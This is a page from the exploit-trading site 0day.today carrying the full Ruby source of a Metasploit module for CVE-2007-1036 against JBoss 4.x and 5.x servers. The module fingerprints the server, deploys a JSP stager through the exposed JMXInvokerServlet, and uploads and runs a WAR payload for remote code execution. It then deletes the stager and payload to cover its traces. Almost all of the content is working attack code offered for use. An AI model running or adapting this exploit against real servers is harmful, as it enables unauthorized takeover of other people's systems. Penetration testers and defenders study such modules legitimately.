0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JBoss DeploymentFileRepository WAR Deployment
require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)', 'Description' => %q{ This module can be used to execute a payload on JBoss servers that have an exposed HTTPAdaptor's JMX Invoker exposed on the "JMXInvokerServlet". By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on Jboss 4.x and 5.x. }, 'Author' => [ 'Patrick Hof', # Vulnerability discovery, analysis and PoC 'Jens Liebchen', # Vulnerability discovery, analysis and PoC 'h0ng10' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2007-1036' ], [ 'OSVDB', '33744' ], [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ], ], 'DisclosureDate' => 'Feb 20 2007', 'Privileged' => true, 'Platform' => ['java', 'win', 'linux' ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ # do target detection but java meter by default [ 'Automatic', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ], [ 'Java Universal', { 'Arch' => ARCH_JAVA, }, ], # # Platform specific targets # [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' }, ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }, ], ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8080), OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]), OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]), OptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]), ], self.class) end def check res = send_serialized_request('version.bin') if (res.nil?) or (res.code != 200) print_error("Unable to request version, returned http code is: #{res.code.to_s}") return Exploit::CheckCode::Unknown end # Check if the version is supported by this exploit return Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/ return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/ return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/ if res.body =~ /ServletException/ # Simple check, if we caused an exception. print_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target fail_with("Unable to automatically select a target") if not mytarget print_status("Automatically selected target: \"#{mytarget.name}\"") else print_status("Using manually select target: \"#{mytarget.name}\"") end # We use a already serialized stager to deploy the final payload regex_stager_app_base = rand_text_alpha(14) regex_stager_jsp_name = rand_text_alpha(14) name_parameter = rand_text_alpha(8) content_parameter = rand_text_alpha(8) stager_uri = "/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp" stager_code = "A" * 810 # 810 is the size of the stager in the serialized request replace_values = { 'regex_app_base' => regex_stager_app_base, 'regex_jsp_name' => regex_stager_jsp_name, stager_code => generate_stager(name_parameter, content_parameter) } print_status("Deploying stager") send_serialized_request('installstager.bin', replace_values) print_status("Calling stager: #{stager_uri}") call_uri_mtimes(stager_uri, 5, 'GET') # Generate the WAR with the payload which will be uploaded through the stager app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) war_data = payload.encoded_war({ :app_name => app_base, :jsp_name => jsp_name, :arch => mytarget.arch, :platform => mytarget.platform }).to_s b64_war = Rex::Text.encode_base64(war_data) print_status("Uploading payload through stager") res = send_request_cgi({ 'uri' => stager_uri, 'method' => "POST", 'vars_post' => { name_parameter => app_base, content_parameter => b64_war } }, 20) payload_uri = "/#{app_base}/#{jsp_name}.jsp" print_status("Calling payload: " + payload_uri) res = call_uri_mtimes(payload_uri,5, 'GET') # Remove the payload through stager print_status("Removing payload through stager") delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}" res = send_request_cgi( {'uri' => delete_payload_uri, }) # Remove the stager print_status("Removing stager") send_serialized_request('removestagerfile.bin', replace_values) send_serialized_request('removestagerdirectory.bin', replace_values) handler end def generate_stager(name_param, content_param) war_file = rand_text_alpha(4+rand(4)) file_content = rand_text_alpha(4+rand(4)) jboss_home = rand_text_alpha(4+rand(4)) decoded_content = rand_text_alpha(4+rand(4)) path = rand_text_alpha(4+rand(4)) fos = rand_text_alpha(4+rand(4)) name = rand_text_alpha(4+rand(4)) file = rand_text_alpha(4+rand(4)) stager_script = <<-EOT <%@page import="java.io.*, java.util.*, sun.misc.BASE64Decoder" %> <% String #{file_content} = ""; String #{war_file} = ""; String #{jboss_home} = System.getProperty("jboss.server.home.dir"); if (request.getParameter("#{content_param}") != null){ try { #{file_content} = request.getParameter("#{content_param}"); #{war_file} = request.getParameter("#{name_param}"); byte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content}); String #{path} = #{jboss_home} + "/deploy/" + #{war_file} + ".war"; FileOutputStream #{fos} = new FileOutputStream(#{path}); #{fos}.write(#{decoded_content}); #{fos}.close(); } catch(Exception e) {} } else { try{ String #{name} = request.getParameter("#{name_param}"); String #{file} = #{jboss_home} + "/deploy/" + #{name} + ".war"; new File(#{file}).delete(); } catch(Exception e) {} } %> EOT # The script must be exactly 810 characters long, otherwise we might have serialization issues # Therefore we fill the rest wit spaces spaces = " " * (810 - stager_script.length) stager_script << spaces end def send_serialized_request(file_name , replace_params = {}) path = File.join( Msf::Config.install_root, "data", "exploits", "jboss_jmxinvoker", "DeploymentFileRepository", file_name) data = File.open( path, "rb" ) { |fd| data = fd.read(fd.stat.size) } replace_params.each { |key, value| data.gsub!(key, value) } res = send_request_cgi({ 'uri' => target_uri.path, 'method' => 'POST', 'data' => data, 'headers' => { 'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation', 'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' } }, 25) if (not res) or (res.code != 200) print_error("Failed: Error requesting preserialized request #{file_name}") return nil end res end def call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil) # JBoss might need some time for the deployment. Try 5 times at most and # wait 5 seconds inbetween tries num_attempts.times do |attempt| if (verb == "POST") res = send_request_cgi( { 'uri' => uri, 'method' => verb, 'data' => data }, 5) else uri += "?#{data}" unless data.nil? res = send_request_cgi( { 'uri' => uri, 'method' => verb }, 30) end msg = nil if (!res) msg = "Execution failed on #{uri} [No Response]" elsif (res.code < 200 or res.code >= 300) msg = "http request failed to #{uri} [#{res.code}]" elsif (res.code == 200) print_status("Successfully called '#{uri}'") if datastore['VERBOSE'] return res end if (attempt < num_attempts - 1) msg << ", retrying in 5 seconds..." print_status(msg) if datastore['VERBOSE'] select(nil, nil, nil, 5) else print_error(msg) return res end end end def auto_target print_status("Attempting to automatically select a target") plat = detect_platform() arch = detect_architecture() return nil if (not arch or not plat) # see if we have a match targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) } # no matching target found return nil end # Try to autodetect the target platform def detect_platform print_status("Attempting to automatically detect the platform") res = send_serialized_request("osname.bin") if (res.body =~ /(Linux|FreeBSD|Windows)/i) os = $1 if (os =~ /Linux/i) return 'linux' elsif (os =~ /FreeBSD/i) return 'linux' elsif (os =~ /Windows/i) return 'win' end end nil end # Try to autodetect the architecture def detect_architecture() print_status("Attempting to automatically detect the architecture") res = send_serialized_request("osarch.bin") if (res.body =~ /(i386|x86)/i) arch = $1 if (arch =~ /i386|x86/i) return ARCH_X86 # TODO, more end end nil end end # 0day.today [2024-12-24] #